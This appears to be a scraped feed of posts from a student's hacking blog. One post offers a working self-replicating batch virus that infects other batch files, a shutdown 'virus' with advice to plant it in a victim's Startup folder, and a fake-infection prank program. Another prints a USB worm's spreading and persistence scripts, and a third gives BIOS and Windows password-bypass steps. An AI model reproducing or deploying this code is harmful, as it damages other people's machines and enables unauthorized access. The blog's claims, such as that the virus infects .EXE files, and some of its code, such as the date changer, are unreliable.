on the Format option. You will see the option ‘Create MS-DOS Start up Disk’. After creating the boot up disk, you will be able to boot into Windows XP using this disk.<br /></span></p><br /><br /><em><br /></em><span style="color: rgb(51, 51, 153);">for further assistance you can Email me or visit my website :: <a href="http://makdee.co.cc/">www.makdee.co.cc</a><br /></span> <p><span style="color: rgb(51, 51, 153);">Mainak Bhattacharya<br />EE, 2nd Yr,</span><span style="color: rgb(51, 51, 153);"> GNIT,</span><span style="color: rgb(51, 51, 153);"> Email: <a href="https://www.google.com/a/makdee.co.cc/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fa%2Fmakdee.co.cc%2F&ltmpl=default&ltmplcache=2">cthmeifucan@makdee.co.cc</a><br /></span></p> <p><br /></p><br /><p align="left"><br /></p>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-10116756107858387152008-02-14T21:58:00.001+05:302008-03-18T07:33:23.324+05:30INFECTED CODES WRITTEN IN C/C++<strong>This is a simple code that changes system time and date. It is written using c/c++ but can be easily converted to java.</strong><br /><p><br /><br /><em>#include "stdio.h"<br />#include "process.h"<br />#include "dos.h"<br /><br />int main(void)<br />{<br />struct date new_date;<br />struct date old_date;<br />struct time t;<br />/*change date*/<br />getdate(&old_date); /*needed only if want to revert back*/<br />new_date.da_year = 2008;<br />new_date.da_day = 1;<br />new_date.da_mon = 1;<br />setdate(&reset);<br />/*change time*/<br />gettime(&t); /*needed only if want to revert back*/<br />t.ti_hour=10;<br />t.ti_min=20;<br />t.ti_sec=30;<br />settime(&t);<br />return 0;<br />} </em><br /><br />Now compile it .Dont run it . Just click on the compile option.Once you complie it you will find the .exe file. This is the virus.<br /><br />To set back to the old date you can use before the "return o;" statement<br />setdate(&old_date);<br /><br />similarly to revert to time use<br />settime(&t);</p><p> </p><p> </p><p> </p><p><strong>Here is the code of a very simple virus that most antivirus will detect unless you have a old version of antivirus. Be careful with this virus although this virus is detected by most antivirus it's a bit dangerous .This virus creates clone of itself. You will land in serious trouble if you spread it to others.Even while testing it yourself test it on a new folder with no important files that too if possible on a empty non-windows drive. I am giving the code purely for educational purpose i dont intend to create any havoc. </strong></p><p> </p><p><br /><em>@echo off>nul.ViRuS<br />if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply<br />if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop<br />if "%1=="/ViRuS_FINDSELF goto ViRuS_findself<br />if "%VOFF%=="T goto ViRuS_OLDBAT<br /><br />set ViRuSname=%0<br />if not exist %0.bat call %0 /ViRuS_FINDSELF %path%<br />if not exist %ViRuSname%.bat set ViRuSname=<br />if "%ViRuSname%==" goto ViRuS_OLDBAT<br /><br />rem ViRuS if batch is started with name.BAT, virus will not become active<br />rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable)<br />rem ViRuS also if batch was only in an append /x:on path (chance=minimal)<br /><br />attrib +h %ViRuSname%.bat<br />for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a<br />attrib -h %ViRuSname%.bat<br />set ViRuSname=<br />goto ViRuS_OLDBAT<br /><br />:ViRuS_findself<br />if "%2==" goto XXX_END>nul.ViRuS<br />if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%<br />if exist %ViRuSname%.bat goto XXX_END<br />if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%<br />if exist %ViRuSname%.bat goto XXX_END<br />shift>nul.ViRuS<br />goto ViRuS_findself<br /><br />:ViRuS_outer_loop<br />for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a<br />goto XXX_END>nul.ViRuS<br /><br />:ViRuS_multiply<br />find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat<br />find /v "ViRuS" <%2 find /v ":XXX_END" >>xViRuSx.bat<br />echo :XXX_END>>xViRuSx.bat<br />copy xViRuSx.bat %2>nul<br />del xViRuSx.bat<br />goto XXX_END>nul.ViRuS<br /><br />:ViRuS_OLDBAT<br />echo on>nul.ViRuS<br />echo This is the dummy Virus Created By Elite and Rishabh<br />:XXX_END </em></p><p><strong> This virus will affect only .EXE and .COM files. These files too will become virus.</strong></p><p> </p><p><strong>Hi let me show you how to create a shutdown/ restart virus. All that this virus does is it will shutdown the comp or restart it. The code is dead simple just 3 words or to say 2 words<br /></strong><br />First we will create the windows version.<br /><br />Now lets create the virus. Just open a notepad and type "shutdown -s" or "restart -s" or "<strong>%systemroot%\system32\shutdown.exe -r</strong>". Now save it as virus.bat or yourname.bat. Now run it. This will do the job as explained below. <strong>Note</strong> if .bat extension doesnt work try .exe extension<br /><br />Let me explain some thing about them. Just close all important aplications. Now go to "RUN" type "cmd". Now you have entered MS-DOS/ Command prompt. Here You need to type "shutdown -s" or "restart -s". This will shutdown or restart your comp. We are making use of this DOS command to create this virus.<br /><br />To make this more poweful just force your victim to copy this into "START>>>ALL PROGRAM>>>> STARTUP". Now this program will load every time the computer starts.<br />Only way out for him is to go in safe mode and delete it from startup.<br /><br />So go ahead and try them out. This is a an ideal virus to play prank on your buddies. </p><p> </p><p> </p><p><strong>This is not actually a virus but a practical joke created by "Sohan Vineet Alva" in C++ . It will make your victim believe that his system is under seize and is infected. Rather I have edited the main CODEC to this one for simplicity in understanding. Remember you need to compile it and generate the .EXE file.<strong> </strong><br /></strong></p><br /><em>#include "iostream.h"<br />#include "conio.h"<br />#include "dos.h"<br />#include "stdio.h"<br />#include "process.h"<br />#include "graphics.h"<br />#include "fstream.h"<br /><br /><br />void ffool(); //FUNCTION WHICH GIVES THE FINAL MESSAGE<br /><br />void main()<br />{<br />clrscr();<br />for(int i=0;i<=100;i++) { textcolor(YELLOW+BLINK); gotoxy(35,12); cprintf("VIRUS LOADING"); gotoxy(39,15); textcolor(GREEN); cout<</em><em><<"%"; delay(75); clrscr(); } delay(100); clrscr(); fflush(stdout); gotoxy(20,12); cout<<" 'TOURNIQUET' VIRUS CREATED BY MAINAK BHATTACHARYA"; gotoxy(20,14); cout<<" SAY GOOD BYE TO YOUR PC IN; THIS D LAST TIME YOUR PC IS RUNNING "; for(int j=5;j>=0;j--)<br />{<br />gotoxy(48,14);<br />cout<<<" SECONDS"; delay(1000); } ofstream f1; f1.open("c:/windows/All Users/desktop/procraetorian.sys"); ofstream f3("c:/windows/All Users/desktop/blast.sys"); ofstream a2("c:/windows/All Users/desktop/mslaugh.exe"); ofstream s2("c:/windows/All Users/desktop/backdoor.sys"); ofstream g2("c:/windows/All Users/desktop/spin32_war.sys"); ofstream h2("c:/windows/All Users/desktop/russpatr.sys"); ofstream j2("c:/windows/All Users/desktop/torr_sys32.sys"); ofstream k2("c:/windows/All Users/desktop/xxx.sys"); ofstream l2("c:/windows/All Users/desktop/i.txt"); ofstream sm("c:/windows/All Users/desktop/am.txt"); ofstream d1("c:/windows/All Users/desktop/your.txt"); ofstream d2("c:/windows/All Users/desktop/worst.txt"); ofstream d3("c:/windows/All Users/desktop/night.txt"); ofstream d4("c:/windows/All Users/desktop/mare.txt"); clrscr(); lowvideo(); cout<<" 1.HARD-DISK CORRUPTION :"; delay(4000); cout<<"completed"; cout<<" 2.MOTHER BOARD CORRUPTION :"; delay(4000); cout<<"completed"; cout<<" 3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND <br />:";<br />delay(4000);<br />cout<<"completed"; cout<<" PROCRAETORIAN.SYS SUCCESSFULLY PLANTED"; delay(3000); rename("VIRUS.EXE","C:WINDOWSStart MenuProgramsStartUpVIRUS.EXE"); //ffool(); } //*END OF MAIN*// //*START OF ffool()*// void ffool() { clrscr(); int g=DETECT,h; initgraph(&g,&h,"\tc\bgi\"); cleardevice(); delay(1000); setcolor(2); settextstyle(1,0,1); delay(1000); setbkcolor(BLUE); highvideo(); outtextxy(50,150,"THE PROCRAETORIAN:"); delay(1500); outtextxy(50,200,"YOUR PC IS NOW UNDER SURVEILANCE BY THE VIRUS HOST"); outtextxy(50,250,"PEA(C)E BE WITH YOU ! ! !"); getch(); delay(4000); closegraph(); exit(0); } //*END OF ffool()*//<br /><br /></em><span style="color: rgb(51, 51, 153);">or further assistance you can Email me. visit my website :: <a href="http://makdee.co.cc">www.makdee.co.cc</a><br /></span><p><span style="color: rgb(51, 51, 153);">Mainak Bhattacharya<br />EE, 2nd Yr,</span><span style="color: rgb(51, 51, 153);"> GNIT,</span><span style="color: rgb(51, 51, 153);"> Email: <a href="https://www.google.com/a/makdee.co.cc/ServiceLogin?service=mail&passive=true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fa%2Fmakdee.co.cc%2F&ltmpl=default&ltmplcache=2">cthmeifucan@makdee.co.cc</a><br /></span></p><p><br /></p>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-33191042042033687762008-01-26T10:42:00.000+05:302008-01-26T10:50:05.430+05:30CONNECT TO REMOTE COMPUTERFirst, I'm going to assume that you want to connect using Remote Desktop. Using that, when you finally do connect, you'll have access to the remote computer almost as if you were sitting in front of it. The bad news here, is that Remote Desktop is a feature of Windows XP Pro, and is not present in XP Home. You'll only be able to access your XP Pro machines using Remote Desktop.<br /><br />Our first barrier is <strong>your place of work</strong>. Depending on how they are connected to the internet, you simply may not be able to connect out. Larger corporations often restrict what protocols are allowed to access the internet. Quite often they restrict access to Web surfing and Email. If that's the case where you work, there's little recourse, other than pleading with your IT department to allow the Remote Desktop protocol (on port 3389) to reach the internet.<br /><br />The next barrier, or at least point of confusion, is <strong>your IP address</strong>. The easiest scenario is if you have a static IP address at home. That way you'll always know what IP address to connect to. In fact, if you have a static IP, you can even register and assign a domain to it, so that you can access your home network by name - something like myhome.mydomain.com - rather than IP address.<br /><br />If you have a dynamic IP address, you can still get to your network, you simply need to know what the current IP address is. There are several approaches, however none of them are really elegant. For example, you can call home and ask someone to visit a site such as Plot IP, which will display your IP, and then having them read it to you over the phone. If you have access to a web server's access logs, you can have your computer at home visit a specific web page periodically and retrieve the IP address from the logs. And finally there are tools that you can use to map a domain name - like myhome.mydomain.com - to a dynamic IP. These tools do require that you install software on your computer to detect IP address changes, and when a change occurs, it may take up to 48 hours for the DNS changes to make their way across the internet.<br /><br />The good news about a dynamic IP is that if your router stays connected continuously, the IP address is actually not likely to change often. The next barrier is <strong>your router</strong>. A router acts as a firewall, and prevents most connections coming in from the internet. Most people only connect out, to surf the web, download files or read email, so that's not a problem for them. But connecting from a remote location <em>to</em> your home is a connection coming in from the outside.<br /><br />The router needs to be configured to forward port 3389 (the Remote Desktop Protocol port) to the computer you want to connect to. Unfortunately exactly how that's done will vary depending on kind of router you have - you'll have to check the documentation. Note that I said you need to configure it to forward <em>to the computer you want to connect to</em>. You can access only one of your computers directly through your router this way. (There are techniques where you can specify that Remote Desktop listen on ports other than 3389. Then by using a different such port for each computer, and forwarding each through the router to the appropriate computer you can connect directly to each. That's beyond the scope of this article, and more complex than most folks will want to deal with.) My approach, for what it's worth, is to allow external remote access to only one machine on my network. Once connected to that machine I can if needed use remote desktop on it to connect to any other machine on my network. It can be a little confusing from a UI perspective, knowing which of the three machines connected in sequence my keystrokes are actually going to, but in practice I don't do it often.<br /><br />Our final barrier is <strong>your IP address on your LAN</strong>. Your IP address on the internet, wether static or dynamic, is assigned by your ISP and really identifies only one device: your router. Within your local network, the router then typically assigns <em>local</em> IP addresses to all of your computers. The router then handles making sure that all the data traveling between the computers on your local network and the internet all go to the right computers. Those local IP addresses never leave your network - the internet sees only your router's IP address. So when you configure your router to forward port 3389 to a computer, you need to select one of your local computers, and configure its IP address as the destination for Remote Desktop. Then, when the router receives a Remote Desktop request from the internet, it forwards that request to the computer whose IP address you configured. The "problem" is that your local network is, more than likely, using dynamic IP addresses. That means that the IP address that are assigned to each computer could change over time.<br /><br />If you leave your computers on all the time, the addresses won't change, and you're probably OK configuring the router with the current IP address of the computer you want to access remotely. If it ever changes, you'll need to update your router's port forwarding configuration for port 3389. If that's unacceptable or inconvenient, the only real solution is to configure one of your computers to have a static IP address, and then configure the router to forward to that one as the Remote Desktop target. <em>Depending on your router</em> it can be as easy as: Configuring the router to assign IP addresses from one range ... say 192.168.1.100 and up. Configuring the TCP/IP properties of one of your machines to be a static IP, and defining it with a value out of that range - say, 192.168.1.2 (normally 192.168.1.1 is reserved for the router itself). In many cases that's enough. In cases where other machines on your network cannot "see" this one machine, it may be necessary add an entry to the "hosts" file on all the other machines that defines the static IP address for this one machine: 192.168.1.2 machinename • As you can see, things get fairly complex fairly quickly. There are other solutions, but I've not tried any of them myself so I'm not qualified to comment on their suitability or their ease of setup: Commercial solutions such as <span style="font-weight: bold;">PC Anywhere</span>, or <span style="font-weight: bold;">GoToMyPC</span>. <span style="font-weight: bold;">VNC</span> (Virtual Network Computing) solutions that operate much like Remote Desktop. RealVNC is one example. <span style="font-weight: bold;">VPN </span>(Virtual Private Network) solutions that create a virtual connection to your entire local network. In recent years, some types of routers come with <span style="font-weight: bold;">VPN</span> support built in.<br /><br /><span style="color: rgb(51, 51, 255);">This blog is written with the help of books @ networking by AJAY GUPTA & @Ethical Hacking by Ankit Fadia & also some other blogs.</span><br /><br />Mainak Bhattacharya<br />EE, 2nd Year, GNIT, <a href="http://www.mainakkol.co.nr/">www.mainakkol.co.nr</a>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-3545690349742752582008-01-25T09:45:00.001+05:302008-03-07T07:09:58.910+05:30REMOVE MUHAHAHA TROJAN<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_3u_petKp980/R9CcDRZFzhI/AAAAAAAAAMA/J9gbzAYYVao/s1600-h/registry.bmp"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_3u_petKp980/R9CcDRZFzhI/AAAAAAAAAMA/J9gbzAYYVao/s320/registry.bmp" alt="" id="BLOGGER_PHOTO_ID_5174807551870881298" border="0" /></a><br /><p><strong>It’s time to KILL the Worm:</strong></p> <p>I have PE Tools installed in my PC i ran to find out the running process. I went through all the process and found out that <span style="font-weight: bold;">svchost.exe</span> was the one responsible for it. Where PE tools helped me was, <span style="font-weight: bold;">svchost.exe</span> was running from a location <span style="font-weight: bold;">C:\heap41a</span> . So this is where the worm resides, hmm interesting now deleting the folder would do our task. But it was not so easy, as I terminated this process <span style="font-weight: bold;">svchost.exe</span> from the process list it would start again. <span style="font-weight: bold;">So I had to boot my XP in safe mode.</span> Why in safe mode is because in safe mode windows loads only the minimum required drivers and doesn’t load any user process, so this means the worm is not started with the windows. Now I searched the folder <span style="font-weight: bold;">C:\heap41b</span> but it was hidden. I went to Tools>folder option and select Show all files and folders and pressed ok. I refreshed the c:\ only to find that it won’t show any hidden folders. I again went to the Tools>folder and found the setting of Show all files and folders was reseted. Now how do I see the content, what I did was went to windows search and in advanced option I gave search hidden files and folders and gave <span style="font-weight: bold;">svchost.exe</span> as the search keyword. Bang it searched it, so I opened the folder to find out this file was not alone, the other files in this Folder were [offspring], <span style="font-weight: bold;">2.mp3(</span>which produces the sound<span style="font-weight: bold;">)</span>, <span style="font-weight: bold;">Icon.ico</span>, <span style="font-weight: bold;">reproduce.txt</span>(on C language), <span style="font-weight: bold;">svchost.exe</span>, <span style="font-weight: bold;">drivelist.txt</span>, <span style="font-weight: bold;">script1.txt</span>, <span style="font-weight: bold;">std.txt</span> . Lets see the content of these text files.</p> <p>[offspring] - Blank Folder</p> <p>2.mp3 - A laughing sound</p> <p>Icon.ico - A blank Icon file</p> <p><strong>reproduce.txt :: a simple copying program<br /></strong></p> <blockquote><p>#notrayicon<br />#persistent<br />ArrayCount = 0<br />Loop, Read,C:\heap41a\driveList.txt<br />{<br />ArrayCount += 1<br />Array%ArrayCount% := A_LoopReadLine<br />}<br />dat1=%userprofile%<br />settimer,reproduce,5000<br />return</p> <p>reproduce:</p> <p>Loop %ArrayCount%<br />{</p> <p>element := Array%A_Index%<br />driveget,data,Type,%element%:\<br />ifequal,data,Removable<br />{<br />driveget,data1,status,%element%:\<br />ifequal,data1,Ready<br />{<br />FileCopydir,C:\heap41a\offspring,%element%:\,1</p> <p>}</p> <p>}<br />}<br />regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\</p> <p>CurrentVersion\policies\Explorer\Run,winlogon<br />ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt<br />Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\</p> <p>CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt<br />return</p></blockquote> <p><strong> svchost.exe :: the main culprit<br /></strong></p> <p>This is the file that is the culprit. The file responsible for all the annoying pop ups</p> <p><strong> script1.txt</strong></p> <blockquote><p>#persistent<br />#notrayicon<br />settimer,ban,2000<br />return</p> <p>ban:<br />WinGetActiveTitle, ed<br />ifinstring,ed,orkut<br />{<br />winclose %ed%<br />soundplay,C:\heap41a\2.mp3<br />msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30<br />return<br />}<br />ifinstring,ed,youtube<br />{<br />winclose %ed%<br />soundplay,C:\heap41a\2.mp3<br />msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30<br />return<br />}<br />ifinstring,ed,Mozilla Firefox<br />{<br />winclose %ed%<br />msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30<br />return<br />}<br />ifwinactive ahk_class IEFrame<br />{</p> <p>ControlGetText,ed,edit1,ahk_class IEFrame<br />ifinstring,ed,orkut<br />{<br />winclose ahk_class IEFrame<br />soundplay,C:\heap41a\2.mp3<br />msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30<br />return<br />}<br />ControlGetText,ed,edit2,ahk_class IEFrame<br />ifinstring,ed,orkut<br />{<br />winclose ahk_class IEFrame<br />soundplay,C:\heap41a\2.mp3<br />msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30<br />return<br />}<br />ControlGetText,ed,edit3,ahk_class IEFrame<br />ifinstring,ed,orkut<br />{<br />winclose ahk_class IEFrame<br />soundplay,C:\heap41a\2.mp3<br />msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30<br />return<br />}<br />ControlGetText,ed,edit4,ahk_class IEFrame<br />ifinstring,ed,orkut<br />{<br />winclose ahk_class IEFrame<br />soundplay,C:\heap41a\2.mp3<br />msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30<br />return<br />}<br />ControlGetText,ed,edit1,ahk_class IEFrame<br />ifinstring,ed,youtube<br />{<br />winclose ahk_class IEFrame<br />soundplay,C:\heap41a\2.mp3<br />msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30<br />return<br />}<br />ControlGetText,ed,edit2,ahk_class IEFrame<br />ifinstring,ed,youtube<br />{<br />winclose ahk_class IEFrame<br />soundplay,C:\heap41a\2.mp3<br />msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30<br />return<br />}<br />ControlGetText,ed,edit3,ahk_class IEFrame<br />ifinstring,ed,youtube<br />{<br />winclose ahk_class IEFrame<br />soundplay,C:\heap41a\2.mp3<br />msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30<br />return<br />}<br />ControlGetText,ed,edit4,ahk_class IEFrame<br />ifinstring,ed,youtube<br />{<br />winclose ahk_class IEFrame<br />soundplay,C:\heap41a\2.mp3<br />msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30<br />return<br />}</p> <p>}<br />return</p></blockquote> <p><strong>std.txt</strong></p> <blockquote><p>#notrayicon<br />#singleinstance,ignore<br />regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\</p> <p>CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue<br />ifnotequal,regdata,2<br />regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\</p> <p>CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2<br />Run C:\heap41a\svchost.exe C:\heap41a\script1.txt<br />Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt</p></blockquote> <p>These files gave away all that this worm does, after reading the script I found out that this worm also hates Youtube. Most important information it gave was the Registery Keys it modified(<span style="font-weight: bold;">most important part</span>).</p> <p><span style="font-weight: bold;">These are the keys that were responsible for the hidden folder problem I faced earlier</span> ::</p> <blockquote> <p><span style="font-weight: bold;">AFFECTED ENTRY ::</span></p><p><span style="font-weight: bold;"></span> REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\<br />CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue<br />ifnotequal,regdata,2</p> <p><span style="font-weight: bold;">ORIGINAL ENTRY ::</span><br /></p><p> REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\CurrentVersion\<br />Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,1</p></blockquote> <p>Now to rectify this go to Start <span style="font-weight: bold;">Menu>Run</span> and type <span style="font-weight: bold;">regedit</span>. In the Registry Editor browse to this entry<br /></p><p><span style="font-weight: bold;">:: </span>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\<br />CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL<br /></p><p>and in the “Checked Value” key reset it back to <span style="font-weight: bold;">1</span> from <span style="font-style: italic;">2</span>. Now you can change the settings in the folders option. Now delete the folder<br /></p> <p><span style="font-weight: bold;">::</span> <span style="font-weight: bold;">C:\heap41a</span> and clear all the key entries from this registry entry :: HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\<br />CurrentVersion\policies\Explorer\Run which says heap41a.</p><p><br /></p> <p style="color: rgb(255, 102, 102); font-weight: bold;">Now the virus infection is removed 100%. Before you are done make sure you format the usb drive it doesn’t infect other systems too.</p> <p>All the best. Untill a tool is out for this worm, you can follow this method to remove w32.USBWorm.</p><br /><p><span style="color: rgb(51, 0, 153);">HAPPY REMOVING THE VIRUS :: I'M VERY HAPPY BECAUSE I HAD TO FORMAT 2 TIMES BEFORE I FOUND THIS VIRUS :: MAY BE IT HELPS YO</span><span style="color: rgb(51, 51, 153);">U....</span></p><p><span style="color: rgb(51, 51, 153);">for further assistance you can Email me. visit my website :: <a href="http://mainakkol.page.tl/">www.mainakkol.co.nr</a><br /></span></p><p><span style="color: rgb(51, 51, 153);">Mainak Bhattacharya<br />EE, 2nd Yr,</span><span style="color: rgb(51, 51, 153);"> GNIT,</span><span style="color: rgb(51, 51, 153);"> Email: mainakkol@gmail.com<br /></span></p><p><br /></p><p><br /></p>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-1240755922655653802007-10-03T00:22:00.000+05:302008-01-27T22:02:27.349+05:30SOMETHING ABOUT VIRUSES & TROJANS<div style="text-align: justify;"><span style="font-weight: bold;">Something you should know:</span><br /></div><br /><ul><li><b>Viruses</b> - A virus is a small piece of software that piggybacks on real programs. For example, a virus might attach itself to a program such as a spreadsheet program. Each time the spreadsheet program runs, the virus runs, too, and it has the chance to reproduce (by attaching to other programs) or wreak havoc.</li></ul><br /><ul><li><b>E-mail viruses</b> - An e-mail virus moves around in <span><span>e-mail messages, and usually replicates itself by automatically mailing itself to dozens of people in the victim's e-mail address book.</span></span></li></ul><br /><ul><li><b>Trojan horses</b> - A Trojan horse is simply a computer program. The program claims to do one thing (it may claim to be a game) but instead does damage when you run it (it may erase your hard disk<a href="http://computer.howstuffworks.com/hard-disk.htm"></a>). Trojan horses have no way to replicate automatically.</li></ul><br /><ul><li><b>Worms</b> - A worm is a small piece of software that uses computer networks<a href="http://computer.howstuffworks.com/home-network.htm"></a> and security holes to replicate itself. A copy of the worm scans the network for another machine that has a specific security hole. It copies itself to the new machine using the security hole, and then starts replicating from there, as well. We'll take a closer look at how a worm works in the next section.</li></ul><br /><p>A <b>computer virus</b> is a <a href="http://en.wikipedia.org/wiki/Computer_program" title="Computer program"></a><span><span>computer program that can copy itself and infect a computer without permission or knowledge of the user. The original virus may modify the copies or the copies may modify themselves, as occurs in a metamorphic virus. A virus can only spread from one computer to another when its host is taken to the uninfected computer, for instance by a user sending it over a network or the Internet, or by carrying it on a removable medium such as a floppy disk, CD, or USB drive. Additionally, viruses can spread to other computers by infecting files on a network file system or a file system that is accessed by another computer. Viruses are sometimes confused with computer worms and Trojan horses. A worm can spread itself to other computers without needing to be transferred as part of a host, and a Trojan horse is a file that appears harmless until executed.</span></span></p> <p>Many personal computers are now connected to the Internet and to local area networks<a href="http://en.wikipedia.org/wiki/Local_area_network" title="Local area network"></a>, facilitating the spread of malicious code. Today's viruses may also take advantage of network services such as the World Wide Web, e-mail, and file sharing systems to spread, blurring the line between viruses and worms. Furthermore, some sources use an alternative terminology in which a virus is any form of self-replicating malware.</p> <p>Some viruses are programmed to damage the computer by damaging programs, deleting files, or reformatting the hard disk. Others are not designed to do any damage, but simply replicate themselves and perhaps make their presence known by presenting text, video, or audio messages. Even these benign viruses can create problems for the <a href="http://en.wikipedia.org/wiki/User_%28computing%29" title="User (computing)"></a><span><span>computer user. </span></span>They typically take up computer memory used by legitimate programs. As a result, they often cause erratic behavior and can result in system crashes. In addition, many viruses are <span><span>bug-rid</span></span>den, and these bugs may lead to system crashes and <a href="http://en.wikipedia.org/wiki/Data_loss" title="Data loss"></a><span><span>data loss</span></span>.</p>Mak's Bloghttp://www.blogger.com/profile/17782056756364925340noreply@blogger.com0tag:blogger.com,1999:blog-3836310671942777887.post-39622199365622182562007-09-24T15:44:00.000+05:302008-01-27T22:05:10.728+05:30TRICKS FOR BYPASSING PASSWORDS<div style="text-align: left;"><br /></div><p style="margin-bottom: 0in; font-family: verdana;">Here i am telling you some procedure of bypassing several password prompts that may appear during startup.....</p><br /><p style="margin-bottom: 0in; font-family: verdana;" align="center"><b>BYPASSING BIOS PASSWORD</b></p> <p style="margin-bottom: 0in; font-family: verdana;" align="left">BIOS password prompt appears before windows booting. So it is certainly a CUI (character User Interface). In some BIOS it can be bypassed very easily. </p> <p style="margin-bottom: 0in; font-family: verdana;" align="left"><br /></p> <ul style="font-family:verdana;"><li><p style="margin-bottom: 0in;" align="left"><span style="">Pressing </span><span style="text-decoration: none;"><b>“<span style="color: rgb(128, 0, 0);">Esc</span>” </b><span style="">for several (50-60 times) times may crash this software & booting may start.</span></span></p> </li><li><p style="margin-bottom: 0in; text-decoration: none;" align="left"> If the above method does not work then you have to do some serious work. Open the cabinet of your CPU. Search for a LI-ION Tablet battery on the MOTHER-BOARD. A jumper should be there. The jumper comes with 2 pins shorted with a metal plate. What you have to do is to short the other 2 pins for 30 sec & Remove the battery.</p> </li><li><p style="margin-bottom: 0in; text-decoration: none;" align="left"> Now place the metal plate to its original position & re-install the battery.</p> </li><li><p style="margin-bottom: 0in; text-decoration: none;" align="left"> Restart your computer. It will boot-up with out password. You have to set the date & Time after windows starts.<br /><br /></p> </li></ul> <p style="margin-bottom: 0in; text-decoration: none; font-family: verdana;" align="center"><b>BYPASSING WINDOWS PASSWORD</b></p> <p style="margin-bottom: 0in; text-decoration: none; font-family: verdana;" align="left"> Bypassing passwords for <b>Windows 98SE</b> or earlier versions is very easy. </p> <ul style="font-family:verdana;"><li><p style="margin-bottom: 0in; text-decoration: none;" align="left"> You can just click “cancel” on the password prompt and the windows starts with its <b>default </b>user.</p> </li><li><p style="margin-bottom: 0in; text-decoration: none;" align="left"> If you want to use a specific user account the follow the steps.</p> </li><li><p style="margin-bottom: 0in; text-decoration: none;" align="left"> Start your computer and begin to press “F8” till a menu appears with some options related to windows password. Select “safe mode with command prompt”.</p> </li><li> <p style="margin-bottom: 0in;"><span style=""><span style="text-decoration: none;">When command prompt appears type “ren *.pwl *.bak” under </span></span>c:\windows<span style=""><span style="text-decoration: none;"> & c:\windows\system32 both folders.</span></span></p> </li><li><p style="margin-bottom: 0in; text-decoration: none;"> Now restart computer. Type any password at the password prompt to open an user account.</p> </li></ul> <p style="margin-bottom: 0in; text-decoration: none; font-family: verdana;"> Bypassing passwords for <b>Windows 2000</b> or later versions is little tougher. </p> <ul face="verdana"><li><p><b>Delete Admin Password</b></p> </li></ul> <p style="font-family: verdana;" align="left"> Boot up with DOS and delete the sam.exe and sam.log files from Winnt\system32\config in your hard drive. Now when you boot up in NT the password on your built-in administrator account will be blank (No password). This solution works only if your hard drive is FAT32 .</p> <ul face="verdana"><li> <p align="left"><b>HOW TO CHANGE PASSWORDS IN COMMAND PROMPT:</b></p> </li></ul> <p style="font-family: verdana;" align="left"> How to use the net user command to change the user password at a Windows command prompt. Only administrators can change domain passwords at the Windows command prompt. To change a user's password at the command prompt, log on as an administrator and type: "net user <user_name> * /domain" (without the quotation marks)<br /><br />When you are prompted to type a password for the user, type the new password, not the existing password. After you type the new password, the system prompts you to retype the password to confirm. The password is now changed.<br /><br 